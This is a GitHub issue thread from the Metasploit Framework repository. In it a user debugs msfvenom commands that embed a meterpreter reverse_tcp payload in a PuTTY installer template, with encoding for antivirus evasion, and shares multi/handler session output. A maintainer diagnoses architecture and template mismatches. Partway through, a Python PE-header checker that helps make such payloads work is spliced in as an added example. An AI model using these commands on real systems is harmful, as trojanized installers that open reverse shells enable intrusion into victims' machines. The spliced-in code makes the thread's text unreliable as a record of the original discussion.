rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Problem with meterpreter and msfvenom #11995

Closed John33000 closed 4 years ago

John33000 commented 5 years ago

Steps to reproduce

Metasploit 4.0.5, Alpha E Kali Linux 4.19.0-kali4-amd64

Target VM : Windows 10

How'd you do it?

  1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows-x putty-64bit-0.71-installer.msi -f exe-only LHOST=192.168.37.206 LPORT=4444 -o /root/Bureau/Somthing32.exe -e x86/shikata_ga_nai -i 5

  2. Use exploit multi/handler

  3. set payload windows/meterpreter/reverse_tcp

  4. set LPORT 4444

  5. SET LHOST 192.168.37.206

  6. exploit

  7. msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.37.206:4444
[*] Sending stage (179779 bytes) to 192.168.37.137
[*] Meterpreter session 3 opened (192.168.37.206:4444 -> 192.168.37.137:49780) at 2019-06-20 16:53:31 +0200
[*] 192.168.37.137 - Meterpreter session 3 closed. Reason: Died

And then nothing; I can't type anything, I can only cancel with Ctrl+C.

I tried 3 times; that's why there are 3 sessions.

bwatters-r7 commented 5 years ago

The name of your template file appears to indicate it has a 64-bit PE header, but the payload you are inserting is x86?

John33000 commented 5 years ago

Yes, I followed a YouTube video and tutorial; he does this and it works.

bwatters-r7 commented 5 years ago

Would you be willing to send us the link to the video?

John33000 commented 5 years ago

https://resources.infosecinstitute.com/how-to-attack-windows-10-machine-with-metasploit-on-kali-linux/#comment-1245429

https://resources.infosecinstitute.com/antivirus-evasion-tools/

https://connect.ed-diamond.com/MISC/MISC-081/Contournement-antiviral-avec-Metasploit-encrypter

Sorry, no YouTube video; I followed these 3 links today and nothing worked...

I also tried Windows 7 without Windows Defender or firewall and... nothing either.

I also used Shellter to build the payload, and got the same error.

bwatters-r7 commented 5 years ago

In the last link they are using a template, and they are specifically using an x86 exe file as the template. Above, you are using what appears to be a 64-bit msi file.

The behavior you are seeing is exactly what I would have expected when you try to run a 32-bit stage in a 64 bit process. You're getting a callback from your stager, but then you're injecting x86 shellcode into an x64 process, and the process crashes. A quick change you could try is to use a 64 payload rather than a 32 bit payload. I am not completely confident in the details of the exe vs msi architecture, but it might not hurt to change your output format to match the msi that you are using as the template, too.

John33000 commented 5 years ago

Is it impossible to create a template in 64-bit? Meterpreter is 32-bit, the encoders too.

OK, I built a payload only in x86, but when I launch multi/handler, run exploit and launch the .exe, nothing happens: no error, no session. Do you have an idea?

bwatters-r7 commented 5 years ago

You should be able to use a 64-bit template. You would also need to make sure that your payload and handler are also 64-bit. I believe the error you had above was not maintaining a consistent architecture. Since you were using a 32-bit payload and handler, the easiest change seemed like using a 32-bit template. If you wanted to change your payload and handler to 64-bit, it should work (but be mindful of the exe/msi formats).

In the case of launching the exploit with no results, is it possible that the AV caught it? Can you examine the logs on the machine running the payload? Specifically, I would check any AV logs and the Windows Application and Security logs. They fill up fast, so check them immediately after running the payload.

John33000 commented 5 years ago

Hi, I tried with a 64-bit template: putty-64bit-0.71-installer.msi (64-bit). My Windows 10 is 64-bit. In msfconsole I use: exploit multi/handler, then use payload windows/x64/meterpreter/reverse_tcp

I build the payload like this: msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 –-platform windows -x putty-64bit-0.71-installer.msi -k LHOST=192.168.37.206 LPORT=4444 -o something64bit.exe

But on my Windows I now get this: "This application can't be executed on your PC; to find a version for your PC, contact your publisher"

My AV is Windows Defender; I disabled the service in services.msc, in the Control Panel and in gpedit.msc.

bwatters-r7 commented 5 years ago

Please try adding -f msi to your command and change your output file from something.exe to something.msi

John33000 commented 5 years ago

Am I stupid or what? I put -f msi in different places and I get the same error:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder or badchars specified, outputting raw payload
Error: Invalid PE signature "\x17\x02\x10V"

and if I remove -f msi, the payload generation works.

I launch the payload.msi on my Windows 10 and I get the error: Impossible to open this installation package. Check with your application reseller that this Windows Installer package is valid

I'm really lost :( It's a simple payload... Every tutorial does this; what's wrong with me?

bwatters-r7 commented 5 years ago

My apologies; after digging in the code with @acammack-r7, it looks like we don't support msi files as templates. You can still use exe files as templates, though.
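Two things in this thread can be checked mechanically before anything is generated: a template has to be a PE image (an .msi is an OLE Compound File, which is why msfvenom cannot find a PE signature in it), and the payload architecture has to match the architecture of the template it is inserted into (the comment above explains that an x86 stage ending up in an x64 process crashes, which is what a session that opens and immediately dies looks like). The following is an added example, not code from this issue or from the Metasploit project: it parses the DOS/COFF headers by hand and reports whether a given payload architecture is consistent with a given template. The function names `inspect_template`, `check_payload_against_template` and `build_minimal_pe` are mine, and the header fixtures are constructed stand-ins for real files.

```python
import struct

# IMAGE_FILE_HEADER.Machine values from the PE/COFF specification.
IMAGE_FILE_MACHINE_I386 = 0x014C   # x86
IMAGE_FILE_MACHINE_AMD64 = 0x8664  # x64
MACHINE_NAMES = {IMAGE_FILE_MACHINE_I386: "x86", IMAGE_FILE_MACHINE_AMD64: "x64"}
# Magic bytes of an OLE Compound File, which is what an .msi package actually is.
OLE_COMPOUND_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"


def inspect_template(data: bytes) -> dict:
    """Classify a candidate template by its headers.

    Returns {"kind": ..., "arch": ...}; kind is "pe", "ole-compound",
    "mz-no-pe" or "unknown"; arch is "x86", "x64", a hex Machine value, or None.
    """
    if data.startswith(OLE_COMPOUND_MAGIC):
        # An .msi is a Compound File, not a PE image: there is no PE signature
        # anywhere in it, so it cannot serve as an injection template.
        return {"kind": "ole-compound", "arch": None}
    if len(data) < 0x40 or data[:2] != b"MZ":
        return {"kind": "unknown", "arch": None}
    # e_lfanew (offset 0x3C of the DOS header) points at the "PE\0\0" signature.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 6 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return {"kind": "mz-no-pe", "arch": None}
    # The COFF file header follows the signature; Machine is its first field.
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    return {"kind": "pe", "arch": MACHINE_NAMES.get(machine, hex(machine))}


def check_payload_against_template(payload_arch: str, template: bytes) -> tuple:
    """Return (ok, reason) for combining a payload of payload_arch with template."""
    info = inspect_template(template)
    if info["kind"] != "pe":
        return (False, f"template is not a PE file (detected: {info['kind']})")
    if info["arch"] != payload_arch:
        # A stage built for one architecture running inside a process of the
        # other crashes, which shows up as a session that opens and then dies.
        return (False, f"architecture mismatch: {payload_arch} payload, {info['arch']} template")
    return (True, f"{payload_arch} payload matches {info['arch']} template")


def build_minimal_pe(machine: int) -> bytes:
    """Constructed fixture: DOS header + PE signature + COFF header, nothing else."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew -> right after the DOS header
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0, 0)
    return bytes(dos) + b"PE\x00\x00" + coff


if __name__ == "__main__":
    # Constructed inputs standing in for the files discussed in the thread.
    fixtures = {
        "putty-64bit.exe (constructed)": build_minimal_pe(IMAGE_FILE_MACHINE_AMD64),
        "putty-32bit.exe (constructed)": build_minimal_pe(IMAGE_FILE_MACHINE_I386),
        "installer.msi (constructed)": OLE_COMPOUND_MAGIC + bytes(512),
    }
    for name, blob in fixtures.items():
        for arch in ("x86", "x64"):
            ok, reason = check_payload_against_template(arch, blob)
            print(f"{name:32} {arch} payload: {'OK' if ok else 'NO'}  {reason}")
```

Run it on a real file by replacing a fixture with `open(path, "rb").read()`; the same Machine field is what `file` reports as "PE32" versus "PE32+", so the two checks should agree.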

John33000 commented 5 years ago

Hi, OK, thank you, I will try. I have another problem with metasploit-framework; should I open another issue, or can I describe the problem here?

John33000 commented 5 years ago

When I launch the .exe on my Windows, nothing happens; same thing in Metasploit, I don't get an error or anything else, just nothing... Every AV is disabled.

msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 –-platform windows -f exe -x Téléchargements/putty.exe -k LHOST=192.168.37.208 LPORT=4444 -o something64bit.exe

msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.37.208   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port